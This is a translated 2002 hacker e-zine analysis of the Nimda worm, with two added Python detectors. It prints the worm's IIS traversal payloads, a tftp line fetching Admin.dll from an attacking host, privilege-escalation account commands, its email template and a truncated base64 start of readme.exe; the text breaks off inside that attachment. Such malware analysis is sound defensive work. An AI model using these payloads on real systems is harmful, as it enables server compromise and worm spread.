Acid Klan4:(4.11.txt):12/03/2002


[11]--------------------[NIMDA virus analysis]-------------------------[11]

||ACCENTS REMOVED SO THE COMMAND INTERPRETER READS IT FASTER||
||BEST VIEWED IN A SHELL EDITOR||

::::::::::NIMDA, THE NEW THREAT::::::::::
by Anthrax

INDEX:
01.-[INTRODUCTION]                Introduction to the full analysis
02.-[PROFILE]                     Biography of the virus
03.-[ANALYSIS PROFILE]            Infected machine and the machine the analysis was done on
04.-[INFECTION DETAILS]           How Nimda attacks
05.-[IN-DEPTH VIRUS ANALYSIS]     Complete analysis of the virus
                                  +PRIMARY STRINGS
                                  +IMPORTANT STRINGS
06.-[THE EMAIL]                   The email it generates and propagates itself with
07.-[HEXADECIMAL ANALYSIS]        Hexadecimal analysis of the virus
08.-[VIRUS SOURCE CODE]           Source code recovered from the analysis with a debugger [DEBUGGER SOURCE]
09.-[PROPHYLAXIS AND ERADICATION] How to prevent it from spreading and, if we are already infected, how to clean the infected machine
10.-[PERSONAL OPINION]            What we think of the virus
11.-[ACKNOWLEDGEMENTS]            People who helped
12.-[FAREWELL]                    Farewell

[INTRODUCTION]

When we talk about a worm, what comes to mind is an apple gnawed by that small, insignificant creature... But in computing terms, a worm is a program that reproduces by itself and can bring our system down completely. Lately they are in fashion... Remember MELISSA, LOVE_LETTER... or the infamous SIRCAM? Well, a new worm has now arrived on the net, similar to Code Red and Code Blue but even more disastrous and brutal. Its name is Nimda [W32.Nimda.A@mm.Worm]. Its main propagation method is, as with most worms, email, but with a twist: it also uses the Unicode and MSADC exploits that work against unpatched Windows NT/2000 systems. With that we have a cross between SIRCAM and [Code Red or Code Blue]... Truly lethal.
[PROFILE]

Name: Nimda Worm
Data names: W32.Nimda.A@mm
            W32.Nimda
            Worm.Nimda.mm
            W32.Nimda.A@mm.Worm
Danger level: 4 so far
Propagation: via e-mail, via vulnerabilities in IIS [Windows NT] systems, and by visiting a web page that is infected or carries the virus.
Bug-tracking system: CRIP 59
Language: probably C, HLL sources
Creator: UNKNOWN, but someone from the People's Republic of China
Country of appearance: probably originated in northern Europe [Norway, Finland, or the northern part of Russia]
Programmed by: Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
Date of appearance: 16-17 September 2001
Reported infections:
    Symantec   workstations: more than 3000   servers: more than 100
    AVP        workstations: more than 2500   servers: more than 80
    Panda      workstations: more than 2800   servers: more than 250
New or unusual things: one of the few viruses with a web-page infection vector, if not the only one of its kind.

[ANALYSIS PROFILE]

Machine: FreeBSD 4.2-STABLE i386
Processor: 486
Hexadecimal editor
Infected machine: Windows NT 4, IIS 5.0

[INFECTION DETAILS]

Nimda uses many means of self-propagation, among them: mailing itself, searching for shared files and printers via NetBIOS on the LAN, searching for shared files and printers via NetBIOS on the Internet, plus the much-talked-about search for IIS vulnerabilities [Unicode and decode]; afterwards it lodges itself in boot files and in files on remote devices.

But how does it act, or what does it do?
The infection begins when the file README.EXE is opened (readme.exe is not visible in the attachment; this is where its masking phase starts).

What does it mail itself with?
With the MAPI directive and service; it comes masked with the CRIP 59 entry.

Which files does it damage?
Whatever is in its path; it overwrites them with itself.

How big is the virus?
Approximately 57344 bytes.

Which IIS vulnerabilities does it take advantage of?
+UNICODE STRINGS
'/scripts/..%255c..'
'/_vti_bin/..%255c../..%255c../..%255c..'
'/_mem_bin/..%255c../..%255c../..%255c..'
'/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..'
'/scripts/..%c1%1c..'
'/scripts/..%c0%2f..'
'/scripts/..%c0%af..'
'/scripts/..%c1%9c..'
'/scripts/..%%35%63..'
'/scripts/..%%35c..'
'/scripts/..%25%35%63..'
'/scripts/..%252f..'

+Microsoft IIS File Permission Canonicalization Vulnerability
 http://www.securityfocus.com/bid/1565
+Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
 http://www.securityfocus.com/bid/1806
+Microsoft IE MIME Header Attachment Execution Vulnerability
 http://www.securityfocus.com/bid/2524
+Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
 http://www.securityfocus.com/bid/2708
+Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability
 http://www.securityfocus.com/bid/2880

Note: the Index Server ISAPI overflow (bid 2880) is the hole Code Red came in through. Nimda does not exploit that overflow itself; it looks for the root.exe backdoor (a copy of cmd.exe) that Code Red II left behind on servers taken that way, which is why /root.exe?/c+ appears among its strings below.

[IN-DEPTH VIRUS ANALYSIS]

+PRIMARY STRINGS
######START######
SVW3 WPWW 6VWh X_^[ 6SVWj _^[u _^[] GGCC GGCC PSh? SSSh VSSS PSSh@ PSSh@ j@PW X[_^ jcY; 6y.VW 6j@h PQPW Pj@VSW PVSSW 6SSW 6_^3 SUVW 6_^]3 6WPWSh WPWSh WPWSh 6VWS 6SShP 6VWS 6SSh0 6VWS 6SSh 6VWS 6SSh 6VWS SPh| 6_^[ ;H(}Rh ;A(}X t0A; 6_^[ SVWhD GY;~ 9~ v GY;~ r QSPh 6PSj X_^[ PVVh X_^] SUVW _^][Y SVWj X_^[ SVW3 Ph~f VPVV Ph~f jc^W X_^[ D$<UP D$@hx D$`QPV D$@P D$@h D$@h D$@h D$@h D$@h D$@h D$@h D$@P D$@P _]Vj @SVW j@P3 C98u |$$3 D$8WP D$Dj D$\PWh0 D$\P D$\h( D$`YWPh D$\h D$\WP l$4u D$0j 9T$,u<; D$ ; u>9T$ u89T$ u89T$ D$\P F9T$ 29T$ 9T$ t D$(u D$\P L$8j QUPS D$\P t$(j l$,UWjfj D$\P D$\P D$TP D$HP D$TPU D$ph D$TP D$HP D$TPU D$`VP D$\P _^][ YuOV X_^[ SVWht PSh0 YYSj&j ^VSP 6SSSSS X_^[ 6j.V QQSV3 6VVj X_^[ SUVW t$@V !SSj _^][ 6Wh ( 6YWV 6t\h 6tUh( 6tyh WVVV 6_^[ PVh? VVVh8 PVVh PVh? WPWVh WPWVh 6_^[ X_^[ PSh?
SSSh PSSV PWSV PWSV PWSh 6^9] 6_[t D$@P D$@hx D$`QPV D$@P D$@h D$@h Yu:W D$`QPV WSSj t7SV SQWPV <{}%<-~!</t <`t <@ufj 6VuD 6YPS 6j.V >Su" th;Y sa >Su5 ^[WWW 6Wt| SPSS QSUV3 6uQUPP 6ubht X_^][Y 6YSV PVh0 _WVP PVVVVV X_^[ SVh0 YYVSh t_VVh tE95 PSh0 D$ SPh D$ UP D$ SP 6VSh0 6SUj D$ P D$ VP D$$YP 6SUj YPVW X_^][ SUVW 6WUV dWUV D$`QPV X_^][ X_^[ _WVP PVVVVV Yj&P X_^[ ^@[_ 6j?P PPh,o QSPh SVWj VPVV VPVV 6_^3 6u?h t WVS NWVS u7WPS u&WVS _^[] strncpy memset strcpy strlen strtok memcpy strchr strcat rand strcmp _strlwr strncat srand free sprintf malloc atoi strstr strrchr MSVCRT.dll _initterm _adjust_fdiv GetCurrentThreadId CloseHandle WriteFile SetFilePointer CreateFileA MoveFileExA ReadFile SetFileAttributesA FindClose FindNextFileA FindFirstFileA WriteProcessMemory OpenProcess GetCurrentProcessId lstrcmpiA HeapCompact Sleep GetTickCount SetThreadPriority GetCurrentThread CreateMutexA lstrcpyA GetComputerNameA LocalFree lstrlenA LocalAlloc CreateThread ReleaseMutex WaitForSingleObject GetDriveTypeA GetLogicalDrives GetFileSize CopyFileA GetFileAttributesA SetFileTime GetFileTime EndUpdateResourceA UpdateResourceA SizeofResource LockResource LoadResource FindResourceA FreeLibrary BeginUpdateResourceA LoadLibraryExA DeleteFileA GetTempFileNameA CreateProcessA GetModuleFileNameA GetCurrentDirectoryA GetCommandLineA GetTempPathA GetSystemDirectoryA GetWindowsDirectoryA GetModuleHandleA GetVersionExA GetProcAddress LoadLibraryA GetSystemTime ExitProcess HeapDestroy GetLastError HeapCreate WritePrivateProfileStringA KERNEL32.dll RegCloseKey RegQueryValueExA RegOpenKeyExA RegEnumKeyExA RegCreateKeyExA RegDeleteKeyA RegEnumValueA RegSetValueExA RegQueryValueA ADVAPI32.dll System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; 
boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> --====_ABC1234567890DEF_==== NUL= [rename] \wininit.ini Personal Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders \*.* EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced \\%s %ld %ld %ld %ld %ld Image Space Exec Write Copy Image Space Exec Read/Write Image Space Exec Read Only Image Space Executable Image Space Write Copy Image Space Read/Write Image Space Read Only Image Space No Access Mapped Space Exec Write Copy Mapped Space Exec Read/Write Mapped Space Exec Read Only Mapped Space Executable Mapped Space Write Copy Mapped Space Read/Write Mapped Space Read Only Mapped Space No Access Reserved Space Exec Write Copy Reserved Space Exec Read/Write Reserved Space Exec Read Only Reserved Space Executable Reserved Space Write Copy Reserved Space Read/Write Reserved Space Read Only Reserved Space No Access Process Address Space Exec Write Copy Exec Read/Write Exec Read Only Executable Write Copy Read/Write Read Only No Access Image User PC Thread Details ID Thread Priority Current Context Switches/sec Start Address Thread Page Faults/sec Virtual Bytes Peak Virtual Bytes Private Bytes ID Process Elapsed Time 
Priority Base Working Set Peak Working Set % User Time % Privileged Time % Processor Time Process Counter 009 software\microsoft\windows nt\currentversion\perflib\009 Counters Version Last Counter software\microsoft\windows nt\currentversion\perflib /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll <html><script language="JavaScript">window.open("readme.eml", null, "resizable=n o,top=6000,left=6000")</script></html> /Admin.dll GET %s HTTP/1.0 Host: www Connnection: close readme main index default html .asp .htm \readme.eml .exe winzip32.exe riched20.dll .nws .eml .doc .exe dontrunold ioctlsocket gethostbyname gethostname inet_ntoa inet_addr ntohl htonl ntohs htons closesocket select sendto send recvfrom recv bind connect socket __WSAFDIsSet WSACleanup WSAStartup ws2_32.dll MAPILogoff MAPISendMail MAPIFreeBuffer MAPIReadMail MAPIFindNext MAPIResolveName MAPILogon MAPI32.DLL WNetAddConnection2A WNetCancelConnection2A WNetOpenEnumA WNetEnumResourceA WNetCloseEnum MPR.DLL ShellExecuteA SHELL32.DLL RegisterServiceProcess VirtualFreeEx VirtualQueryEx VirtualAllocEx VirtualProtectEx CreateRemoteThread HeapCompact HeapFree HeapAlloc HeapDestroy HeapCreate KERNEL32.DLL SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Type Remark SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$ Parm2enc Parm1enc Flags Path SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan 
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares Cache Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail QUIT Subject: From: < DATA RCPT TO: < MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe octet wwwwwp pwlo wwww wwwwwwwwwwx wwwwwwx wwwwx wwwx lffffff ffff ffff CCCCCC CCCCCCCCC NPAD PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX %0C0Q0_0m0 1&1g1 2i2s2 2I3V3d3s3 6Y6~6 7.7H7{7 8>8J8`8e8 9!9@9W9 :!:[:d:o: ;O;U;k; <&=2=8=E=O=^=j= >">)>.>E>^> ?)?0?5?@?M?T?]?|? 0'0/0C0 1!1*111:1A1J1Y1q1v1}1 1'2K2 3-343S3a3 4.494?4Q4Y4c4o4u4|4 5,515D5I5Z5_5p5u5 6,616D6I6Y6^6o6 7&7+7>7C7S7X7h7m7}7 8(8-8@8E8U8Z8j8o8 9*9/9B9G9W9\9l9q9 : ;8;A;_;h;v; <T<d< >2>U>~> ?!?(?/?Q?X?q? 0'030?0X0}0 2<2W2t2 203I3k3~3 4+464B4U4{4 5,5>5P5b5q5 5.646H6g6n6}6 7?7Q7V7 8!8-8:8F8L8q8 929D9O9T9Z9m9v9 <5<?<M<`<f<y< =2=O=h= >">,>@>Q>W>i>v> ?&?6?W?u? 0.0;0R0v0 02171=1Q1W1d1o1v1 2+20262A2U2`2 2.3?3V3\3k3 4$494K4a4v4 5.575J5P5u5{5 6F6k6 777}7 8-848A8N8g8w8 9 9(9-9<9D9P9X9d9l9y9 9":3:=:B:K:W:\:d:i:o:v:{: ;#;(;1;?;G;L;U;\;d;i;o;v;{; <#<(<.<5<:<C<N<V<[<a<h<m<s<z< =!='=.=3=9=@=E=K=R=W=]=d=i=o=v={= >.>J>v> ?.?J?\?m? :0E0Z0x0 1)1D1{1 2&272M2d2 4!4*4@4F4O4 5-5B5R5[5o5y5 6&6I6S6e6 707b7 8%8:8E8R8 9*979P9p9 :7:=:F:N:X:a:m:u:|: ;;;L;o; <N<Y<k< =N=y= >+>1>Q>^>f>l>w> ?5?>?W?_?p? 141N1W1 1b2{2 3.3^3d3k3 41474B4H4V4^4e4j4p4 5)5>5F5R5Z5i5v5|5 6!6n6 7 7)757X7m7x7 8;8F8K8R8W8]8c8 9 9F9L9[9d9v9 ;(;8;>;m; <!<.<9<@<_<q< =+=1=y= >V>\>r>x> ?#?;?B?M?T?z? 
0v0~0 1 1'141K1d1j1~1 1#2B2`2t2 3%373I3t3{3 4 4+484@4N4S4X4]4h4u4 465R5
######END######

But there is plenty of garbage in there..... What in the virus interests us?..... Here is a small part of the interesting bits...

1.-
+Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
THIS SUGGESTS IT WAS DEVELOPED IN THE PEOPLE'S REPUBLIC OF CHINA (a string the author can write freely, so it is a hint, not proof)

2.-
/scripts                                          --- Unicode exploits
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20          --- TFTP
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
UNICODE, DECODE AND MSADC EXPLOITS USED (the last string is what it appends to web pages on an infected server so that visitors open readme.eml)

3.-
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative";
 boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
 boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"    ----------- Standard charset, a pity
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

--====_ABC1234567890DEF_====
MIME TYPES AND HEADERS (the attachment is declared as audio/x-wav but named readme.exe, and the hidden iframe loads it by Content-ID)

4.-
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
USERS TO ATTACK AND DEVASTATE, AND ACQUISITION OF PRIVILEGES.
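The request strings in point 2 above only work because an unpatched IIS 4/5 checked for ".." before it had finished decoding the URL, then decoded it again (the double "%25" trick and the overlong UTF-8 forms such as %c0%af). The model below is an example added to this analysis, not Nimda's code nor Microsoft's: it reproduces the decode sequence, runs the traversal check at the point the vulnerable server did and at the point the fixed server does, and scans a few constructed IIS-style log lines for the same probes. The lenient UTF-8 decoder and the log format are simplifications made here.

```python
"""Model of the IIS canonicalization weaknesses behind Nimda's request strings
(double percent-encoding and overlong UTF-8), with the traversal check an
unpatched server applied beside the check a patched server applies.
Added example; not Nimda's code or Microsoft's.
"""
import re

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")


def percent_decode(data: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes such as '%%35' are left alone,
    which is exactly what turns '%%35%63' into '%5c' for the next pass."""
    return PCT.sub(lambda m: bytes([int(m.group(1).decode(), 16)]), data)


def lenient_utf8(data: bytes) -> bytes:
    """Decode two-byte UTF-8 lead bytes the way the vulnerable decoder did: five
    bits from the lead byte, six from the byte after it, with no check that the
    result is not an overlong form of an ASCII byte, nor that the second byte is
    a real continuation byte.  0xC0 0xAF -> '/', 0xC1 0x1C -> '\\'."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:            # overlong: smuggled ASCII byte
                out.append(cp)
                i += 2
                continue
        out.append(b)
        i += 1
    return bytes(out)


def canonicalize_once(path: str) -> str:
    """What the traversal check saw on an unpatched server: one %XX pass only."""
    return percent_decode(path.encode("latin-1")).decode("latin-1")


def canonicalize_full(path: str) -> str:
    """What the file system finally received: %XX, lenient UTF-8, %XX again."""
    raw = path.encode("latin-1")
    return percent_decode(lenient_utf8(percent_decode(raw))).decode("latin-1")


def escapes_root(decoded: str) -> bool:
    """True when the path climbs above the virtual directory it started in."""
    depth = 0
    for seg in re.split(r"[\\/]+", decoded.strip("\\/")):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def blocked_unpatched(path: str) -> bool:
    """Check applied before the later decode stages: bypassed by every probe."""
    return escapes_root(canonicalize_once(path))


def blocked_patched(path: str) -> bool:
    """Check applied to the fully canonicalized path, as the fixed server does."""
    return escapes_root(canonicalize_full(path))


# The request prefixes listed in point 2 (the page's own strings).
NIMDA_PROBES = [
    "/scripts/..%255c..",
    "/_vti_bin/..%255c../..%255c../..%255c..",
    "/_mem_bin/..%255c../..%255c../..%255c..",
    "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..",
    "/scripts/..%c1%1c..",
    "/scripts/..%c0%2f..",
    "/scripts/..%c0%af..",
    "/scripts/..%c1%9c..",
    "/scripts/..%%35%63..",
    "/scripts/..%%35c..",
    "/scripts/..%25%35%63..",
    "/scripts/..%252f..",
]

# Constructed IIS-style log lines (method, URL, status); not real traffic.
SAMPLE_LOG = [
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 200",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.9%20GET%20Admin.dll 200",
    "GET /scripts/root.exe?/c+dir 404",
    "GET /default.asp 200",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 200",
]


def flag_requests(lines):
    """Log lines whose decoded URL escapes the web root, or that ask for
    root.exe (the cmd.exe copy left by Code Red II that Nimda also tries)."""
    hits = []
    for line in lines:
        url = line.split()[1].split("?", 1)[0]
        if blocked_patched(url) or url.lower().endswith("/root.exe"):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for probe in NIMDA_PROBES:
        print(f"{probe:<70} -> {canonicalize_full(probe)}")
    print(len(flag_requests(SAMPLE_LOG)), "suspicious requests")
```

Running it shows every probe reaching the file system as "..\" or "../" while blocked_unpatched() returns False for all of them; a plainly encoded "/scripts/..%5c.." is caught by both checks, which is why the worm never sends that form. The same canonicalize-then-check order is the rule for any path filter: decode completely first, then decide.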
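Point 3 above is the mail-side trick: the HTML part carries a zero-sized iframe that loads an attachment by Content-ID, and the attachment is declared audio/x-wav while being named readme.exe and containing a PE image, which is what made the affected Internet Explorer version run it on preview. The checker below is an example added to this analysis, built on Python's standard email parser, not code from the worm or from the author of the page. The message it parses is constructed from the headers shown above with a fake 64-byte MZ stub in place of the real attachment, and the list of executable extensions is an assumption.

```python
"""Detect the hidden-iframe / mislabelled-attachment pattern of a Nimda-style
message.  Added example: the message is constructed, the attachment is a fake
MZ stub, and EXEC_EXTENSIONS is an assumed list.
"""
import base64
import email
import re

IFRAME_TAG = re.compile(rb"<iframe\b[^>]*>", re.I)
CID_ATTR = re.compile(rb"src=[\"']?cid:([^\s\"'>]+)", re.I)
ZERO_SIZE = re.compile(rb"\b(height|width)=[\"']?0\b", re.I)
EXEC_EXTENSIONS = {"exe", "com", "pif", "scr", "bat", "vbs"}  # assumed list

# Constructed attachment body: a 64-byte MZ stub, not the real readme.exe.
FAKE_MZ_B64 = base64.b64encode(b"MZ\x90\x00" + bytes(60)).decode()

# Constructed message using the headers the worm generates (see point 3).
SAMPLE_EML = """\
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative";
 boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
 boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

{b64}

--====_ABC1234567890DEF_====--
""".format(b64=FAKE_MZ_B64)


def hidden_cid_iframes(html: bytes) -> list:
    """Content-IDs loaded by <iframe> tags that are both height=0 and width=0."""
    cids = []
    for tag in IFRAME_TAG.findall(html):
        m = CID_ATTR.search(tag)
        dims = {d.lower() for d in ZERO_SIZE.findall(tag)}
        if m and dims == {b"height", b"width"}:
            cids.append(m.group(1).decode())
    return cids


def analyze_message(raw: str) -> dict:
    """Walk every MIME part, pair hidden iframes with the attachments they
    load, and report the ones whose declared type hides an executable."""
    msg = email.message_from_string(raw)
    hidden, attachments = [], {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        body = part.get_payload(decode=True) or b""   # CTE-decoded bytes
        if ctype == "text/html":
            hidden += hidden_cid_iframes(body)
        elif part.get_filename():
            cid = (part.get("Content-ID") or "").strip("<>")
            attachments[cid] = {
                "filename": part.get_filename(),
                "declared_type": ctype,
                "is_pe": body[:2] == b"MZ",          # DOS/PE magic
            }
    findings = []
    for cid in hidden:
        att = attachments.get(cid)
        if not att:
            continue
        ext = att["filename"].rsplit(".", 1)[-1].lower()
        if ext in EXEC_EXTENSIONS or att["is_pe"]:
            findings.append(
                f"hidden iframe loads {att['filename']} declared as "
                f"{att['declared_type']} (PE header: {att['is_pe']})"
            )
    return {"hidden_iframe_cids": hidden, "attachments": attachments,
            "findings": findings}


if __name__ == "__main__":
    for line in analyze_message(SAMPLE_EML)["findings"]:
        print(line)
```

The three signals (zero-sized iframe with a cid: source, a declared type that is not an executable type, and MZ bytes or an executable extension behind it) are each weak alone; together they describe this message and little legitimate mail, which is what a gateway rule for it should key on rather than the boundary strings, which a variant can change.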
5.-
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
COPYING, REPRODUCTION AND INJECTION OF THE VIRUS (load.exe is started from the Shell= line of system.ini, and riched20.dll is replaced so that programs loading it run the worm)

[THE EMAIL]
#################################START#################################
This is a multi-part message in MIME format.

--------------9320CF73DE613805C122C17B
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit

--------------9320CF73DE613805C122C17B
Content-Type: text/html; charset=koi8-r;
 name="index.html"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="index.html"

<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

--------------9320CF73DE613805C122C17B
Content-Type: text/html; charset=koi8-r;
 name="readme.eml"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="readme.eml"

MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative";
 boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
 boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAMF4gtYAAAB/UEUAAEwBBQB1Oqc7 AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA AAAABAAAAAAAAAAAEAEAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AACEgQAAUAAAAADgAACIHgAAAAAAAAAAAAAAAAAAAAAAAAAAAQA4CgAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIQBAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAudGV4dAAAAFZlAAAAEAAAAHAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAq CQAAAIAAAAAQAAAAgAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAKEcAAACQAAAAIAAAAJAAAAAA AAAAAAAAAAAAAEAAAMAucnNyYwAAAAAgAAAA4AAAACAAAACwAAAAAAAAAAAAAAAAAABAAABALnJl bG9jAABGCwAAAAABAAAQAAAA0AAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 